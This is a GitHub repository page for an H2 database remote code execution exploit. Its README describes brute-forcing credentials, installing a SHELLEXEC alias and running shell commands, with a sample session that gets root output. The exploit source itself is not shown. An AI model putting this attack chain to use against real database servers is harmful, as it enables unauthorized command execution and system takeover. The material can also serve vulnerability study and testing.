Skip to content

cExplr/H2_RCE_Exploit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
README.md
README.md
 
 
h2_RCE.py
h2_RCE.py
 
 

Repository files navigation

H2_RCE Exploit

==========================================================================================================================
==========================================================================================================================
THIS IS FOR EDUCATION PURPOSES ONLY. PLEASE DO NOT USE THIS ON ANY REAL SYSTEMS AROUND YOU AND DONT EVEN THINK ABOUT IT.
PLEASE BE RESPONSIBLE AND ETHICAL. BE REMINDED THAT IF YOU ARE CAUGHT, YOU WILL BE IN GRAVE TROUBLE. THE H2 DATABASE HAS 
VERY QUICKLY PATCHED THIS VULNERABILITY!
==========================================================================================================================
==========================================================================================================================

If localhost is used via SSH port forwarding, the url for H2 Database must include http://localhost:XXXX where XXXX is the port number\

usernames and passwords list are provided in case we do not know the password and wishes to bruteforce it. Edit if you wanna use a wordlist

Once credentials are confirmed then a setup payload is used to initialize the function for executing scripts In this case, when we input command after the setup payload is sent, a query to CALL SHELLEXEC(WHATEVERCOMMAND) will output to you the values.

TO EXIT GRACEFULLY, JUST TYPE "EXIT"

EXAMPLE :

root@kali:~# python h2_RCE.py
[*] Start Exploiting outdated H2 ? 
[*] Press any key to Continue ...
[*] Enter url for the database : http://localhost:8113
[*] Testing for credentials ... 
[*] Obtaining new jsessionId ...
locationref : login.jsp?jsessionid=c5e0ef021f98c37328803e6c9f777e65
jsessionid : c5e0ef021f98c37328803e6c9f777e65
[*] Testing username : sa , password : 12345
===================================================================
Attempt to connect to  http://localhost:8113/login.do?jsessionid=c5e0ef021f98c37328803e6c9f777e65

[+] Credentials found!

USERNAME : sa
PASSWORD : 12345


================================================================


[+] LOGGED IN SUCCESSFULLY
[+] Credentials Confirmed!


[*] Preparing to send payload ... 
[*] Setting up payload : ... 
[+] Query URL : http://localhost:8113/query.do?jsessionid=c5e0ef021f98c37328803e6c9f777e65
[*] Sending Payload To Setup ...
[+] Attempt for payload setup done
Enter command --> id
call SHELLEXEC('id')
[*]Executing id

=========================================

id

 uid=0(root) gid=0(root) groups=0(root)

=========================================



Enter command --> EXIT
Stopping Exploitation ...

REFERENCES

https://mthbernardes.github.io/rce/2018/03/14/abusing-h2-database-alias.html Based off the code from searchsploit exploits/java/local/44422.py

Rewritten by me to continously get commands without needing to continuously resend payload or rerun the program

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

3 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages